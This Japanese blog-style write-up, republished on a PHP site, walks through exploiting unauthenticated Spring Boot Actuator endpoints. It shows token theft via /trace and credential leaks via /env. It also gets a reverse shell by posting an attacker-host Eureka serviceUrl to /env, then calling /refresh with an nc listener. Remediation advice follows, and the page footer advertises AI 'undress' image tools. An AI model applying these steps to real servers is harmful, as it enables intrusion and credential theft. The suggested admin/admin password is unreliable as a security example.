ホームページ 運用・保守 安全性 Spring Boot Actuator の getshell への不正アクセスの分析例

Spring Boot Actuator の getshell への不正アクセスの分析例

May 23, 2023 am 08:56 AM
spring boot actuator getshell

まえがき

この脆弱性は、あるソースにある古い穴を部署の上司が掘ってくれたので、面白そうだと思い、ローカル環境を立ててテストしてみました。

Actuator は、アプリケーション システムのイントロスペクションと監視のために Springboot によって提供される機能モジュールです。Actuator を利用することで、開発者はアプリケーション システムの特定の監視指標に関する統計を簡単に表示および収集できます。 Actuator が有効な場合、関連する権限が制御されていない場合、不正なユーザーがデフォルトの Actuator エンドポイントにアクセスすることでアプリケーション システムの監視情報を取得でき、情報漏洩やサーバー乗っ取りにつながる可能性があります。

Actuator は Spring Boot が提供する機能モジュールで、アプリケーション システムのイントロスペクションとモニタリングに使用できます。提供されるエグゼキューター エンドポイントは、ネイティブ エンドポイントとユーザー定義の拡張エンドポイントの 2 つのカテゴリに分類されます。ネイティブ エンドポイントには主に次のものが含まれます:

Spring Boot Actuator从未授权访问到getshell的示例分析

#活用アイデア

  1. #env と更新を使用して getshell を実行します


  2. マッピングを使用して未承認のインターフェイスを見つけます


  3. トレースを使用して認証情報 (Cookie、Tooken、Session) を取得し、その認証情報を使用してインターフェイスにアクセスします。


  4. env からデータベースアカウントのパスワード (mangodb) が漏洩する可能性がありますが、当然ながら外部ネットワークは公開されている必要があるため、可能性は低いです。


  5. 外国人は SQL 文が実行できると言っていますが、まだ理解できません


脆弱性発見


通常は、現在の Web アプリケーションで使用されているフレームワークを springboot フレームワークとして識別します。

  1. Web アプリケーションの Web ページ ラベル (favicon.ico) のアイコンを通じて、Web アプリケーション開発者が Springboot のデフォルトのアイコンを変更していない場合は、主に 2 つの判断方法があります。 Web アプリケーションを選択し、アプリケーションに入ります。ホームページの後に、次のデフォルトの緑色の小さなアイコンが表示されます。


Spring Boot Actuator从未授权访问到getshell的示例分析

    # #デフォルトのエラー ページは、springboot フレームワークを通じて報告されます; if Web アプリケーション開発者が springboot Web アプリケーションのデフォルトの 4xx および 5xx エラー ページを変更していない場合、Web アプリケーションで 4xx または 5xx エラーが発生すると、次のエラーが発生します。 (ここでは例として 404 エラー ページのみが使用されています): ランダムに構築されたパスにアクセスします (例: http://172.26.2.24:8090/index)。次のエラー ページが表示される場合は、Web Web サイトがspringboot フレームワークを使用します (実際に遭遇する状況のほとんどはこれに似ています)。

Spring Boot Actuator从未授权访问到getshell的示例分析 上記の 2 つの方法を組み合わせて、現在の Web アプリケーションが Springboot フレームワークであるかどうかを判断するには、さまざまなディレクトリにアクセスして、小さな緑色の葉のアイコンをクリックして、別のディレクトリにあるアプリケーションの 4xx または 5xx エラーをトリガーする方法を見つけて、ホワイトラベル エラー ページ エラーがあるかどうかを確認します。

脆弱性の悪用


/trace エンドポイントにアクセスして、基本的な HTTP リクエスト追跡情報 (タイムスタンプ、HTTP ヘッダーなど) を取得します。ユーザーでは、ログインするために Cookie を偽造できます。

Spring Boot Actuator从未授权访问到getshell的示例分析/env エンドポイントにアクセスして、すべての環境属性を取得します。アクチュエータはサイト上の mysql や mangodb などのデータベース サービスを監視するため、mysql や mangodb のデータベース情報が取得される場合があります。監視情報を通じて取得されます。データベースがたまたまパブリック ネットワーク上で開かれていた場合、引き起こされる被害は甚大です。

Spring Boot Actuator从未授权访问到getshell的示例分析/env エンドポイントは、RCE を引き起こすように不適切に構成されています。

前提条件: Eureka -Client

たとえば、フロントエンド JSON エラー レポートをテストしてパッケージ名を漏らす場合は、netflix を使用します

Spring Boot Actuator从未授权访问到getshell的示例分析次の 2 つが必要です パッケージ

spring-boot-starter-actuator (/refresh リフレッシュ設定が必要です)

spring-cloud-starter-netflix -eureka-client (機能依存関係)

Use python3 スクリプトを開始するときは、2 つの場所に注意する必要があります。1 つはシェルを受信するための IP とポート、もう 1 つはスクリプトのポートです。まず、

Spring Boot Actuator从未授权访问到getshell的示例分析

Spring Boot Actuator从未授权访问到getshell的示例分析Nc はポートをリッスンしてリバウンド シェルを受信します。

#設定を書き込み、 /env エンドポイント、パケットをキャプチャし、get リクエストを post リクエストに変更します。post コンテンツは次のとおりです (ip はスクリプトによって開始されたマシンの ip です) :

eureka.client.serviceUrl.defaultZone=http://10.1.1.135:2333/xstream

Spring Boot Actuator从未授权访问到getshell的示例分析

次に、/refresh にアクセスしてパケットをキャプチャし、get リクエストを変更します。投稿リクエストへ、投稿データは任意です。

Spring Boot Actuator从未授权访问到getshell的示例分析

# 次に、NC ウィンドウで、シェルが正常にバウンスバックされたことがわかります。

Spring Boot Actuator从未授权访问到getshell的示例分析

脆弱性の修復

セキュリティ犬として、修正せずにただ掘ることはできません。プロジェクトの pom.xml の下に spring-boot を導入してください。 file -starter-security は

<dependency>
	<groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-security</artifactId>
</dependency>
ログイン後にコピー

Spring Boot Actuator从未授权访问到getshell的示例分析

に依存します。次に、application.properties でセキュリティ機能を有効にし、アクセス アカウントのパスワードを設定し、アプリケーションを再起動するとポップアップが表示されます。

management.security.enabled=true
security.user.name=admin
security.user.password=admin
ログイン後にコピー

Spring Boot Actuator从未授权访问到getshell的示例分析

Spring Boot Actuator从未授权访问到getshell的示例分析

インターフェースを無効にするには、次のように設定できます (env インターフェースの無効化など):

endpoints.env.enabled = false

質問

外国人は SQL ステートメントを実行できると言いましたが、実行できないことがわかりました。方法が間違っているのかもしれません。彼の写真のスクリーンショット。正常に実行できる人がそれを共有できることを願っています。

Spring Boot Actuator从未授权访问到getshell的示例分析

実際の環境では、リフレッシュが行われないことが多く、コマンドが実行できないことが確認されており、まだ打開策はありません。

以上がSpring Boot Actuator の getshell への不正アクセスの分析例の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。

ホットAIツール

Undresser.AI Undress

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

Undress AI Tool

脱衣画像を無料で

Clothoff.io

Clothoff.io

AI衣類リムーバー

Video Face Swap

Video Face Swap

完全無料の AI 顔交換ツールを使用して、あらゆるビデオの顔を簡単に交換できます。

ホットツール

メモ帳++7.3.1

メモ帳++7.3.1

使いやすく無料のコードエディター

SublimeText3 中国語版

SublimeText3 中国語版

中国語版、とても使いやすい

ゼンドスタジオ 13.0.1

ゼンドスタジオ 13.0.1

強力な PHP 統合開発環境

ドリームウィーバー CS6

ドリームウィーバー CS6

ビジュアル Web 開発ツール

SublimeText3 Mac版

SublimeText3 Mac版

神レベルのコード編集ソフト(SublimeText3)

Spring Boot + MyBatis + Atomikos + MySQL (ソースコード付き) Spring Boot + MyBatis + Atomikos + MySQL (ソースコード付き) Aug 15, 2023 pm 04:12 PM

実際のプロジェクトでは、分散トランザクションを避けるように努めます。ただし、場合によってはサービスを分割する必要があり、分散トランザクションの問題が発生することがあります。同時に、分散取引についても面接で質問されるので、このケースで練習し、面接で 123 について話すことができます。

Spring Boot を通じて多言語サポートと国際アプリケーションを実現 Spring Boot を通じて多言語サポートと国際アプリケーションを実現 Jun 23, 2023 am 09:09 AM

グローバリゼーションの進展に伴い、多言語サポートや国際化機能を提供する必要のある Web サイトやアプリケーションがますます増えています。開発者にとって、これらの機能を実装することは、言語翻訳、日付、時刻、通貨の形式など、多くの側面を考慮する必要があるため、簡単な作業ではありません。ただし、SpringBoot フレームワークを使用すると、多言語サポートと国際アプリケーションを簡単に実装できます。まず、SpringBoot が提供する LocaleResolver インターフェースについて理解しましょう。ロック

Spring Boot を使用してビッグデータ処理アプリケーションを構築する方法 Spring Boot を使用してビッグデータ処理アプリケーションを構築する方法 Jun 23, 2023 am 09:07 AM

ビッグデータ時代の到来により、ますます多くの企業がビッグデータの価値を理解し、認識し、ビジネスに活用し始めています。それに伴う問題は、この大規模なデータ フローをどのように処理するかです。この場合、ビッグ データ処理アプリケーションは、すべての企業が検討しなければならないものになっています。開発者にとっては、SpringBoot を使用して効率的なビッグデータ処理アプリケーションを構築する方法も非常に重要な問題です。 SpringBoot は非常に人気のある Java フレームワークです。

Spring Boot を使用してブロックチェーン アプリケーションとスマート コントラクトを構築する方法 Spring Boot を使用してブロックチェーン アプリケーションとスマート コントラクトを構築する方法 Jun 22, 2023 am 09:33 AM

ビットコインなどのデジタル通貨の台頭により、ブロックチェーン技術が徐々に話題になっています。スマート コントラクトは、ブロックチェーン テクノロジーの重要な部分とみなすことができます。 SpringBoot は、人気のある Java バックエンド開発フレームワークとして、ブロックチェーン アプリケーションやスマート コントラクトの構築にも使用できます。この記事では、SpringBoot を使用してブロックチェーン テクノロジーに基づいたアプリケーションとスマート コントラクトを構築する方法を紹介します。 1. SpringBoot とブロックチェーン まず、ブロックチェーンに関連するいくつかの基本概念を理解する必要があります。ブロックチェーン

Spring Boot と MyBatis Plus に基づいて ORM マッピングを実装する Spring Boot と MyBatis Plus に基づいて ORM マッピングを実装する Jun 22, 2023 pm 09:27 PM

Java Web アプリケーションの開発プロセスでは、ORM (Object-RelationalMapping) マッピング テクノロジを使用してデータベース内のリレーショナル データを Java オブジェクトにマッピングし、開発者がデータにアクセスして操作するのを容易にします。 SpringBoot は、最も人気のある Java Web 開発フレームワークの 1 つとして、MyBatis を統合する方法を提供しています。MyBatisPlus は、MyBatis に基づいて拡張された ORM フレームワークです。

Spring Boot と NoSQL データベースの統合と使用 Spring Boot と NoSQL データベースの統合と使用 Jun 22, 2023 pm 10:34 PM

インターネットの発展に伴い、ビッグデータ分析とリアルタイム情報処理が企業にとって重要なニーズとなっています。このようなニーズを満たすために、従来のリレーショナル データベースはビジネスやテクノロジー開発のニーズを満たせなくなりました。代わりに、NoSQL データベースを使用することが重要なオプションになっています。この記事では、最新のアプリケーションの開発と展開を可能にする、NoSQL データベースと統合された SpringBoot の使用について説明します。 NoSQL データベースとは何ですか? NoSQL は SQL だけではありません

Spring Boot と Apache ServiceMix を使用した ESB システムの構築 Spring Boot と Apache ServiceMix を使用した ESB システムの構築 Jun 22, 2023 pm 12:30 PM

現代のビジネスがさまざまな異種のアプリケーションやシステムにますます依存するようになるにつれて、企業の統合がさらに重要になります。 Enterprise Service Bus (ESB) は、さまざまなシステムとアプリケーションを接続して共通のデータ交換サービスとメッセージ ルーティング サービスを提供し、エンタープライズ レベルのアプリケーション統合を実現する統合アーキテクチャ モデルです。 SpringBootとApacheServiceMixを使えば簡単にESBシステムを構築できるので、その実装方法を紹介します。 SpringBoot と A

Spring Boot に基づく分散データ キャッシュおよびストレージ システム Spring Boot に基づく分散データ キャッシュおよびストレージ システム Jun 22, 2023 am 09:48 AM

インターネットの継続的な発展と普及に伴い、データの処理と保存の需要も増加しており、データを効率的かつ確実に処理および保存する方法が業界や研究者の間で話題になっています。 SpringBoot をベースとした分散データ キャッシュおよびストレージ システムは、近年大きな注目を集めているソリューションです。分散データ キャッシュおよびストレージ システムとは何ですか?分散データ キャッシュおよびストレージ システムとは、複数のノード (サーバー) を介したデータの分散ストレージを指します。これにより、データのセキュリティと信頼性が向上し、データ処理も向上します。

See all articles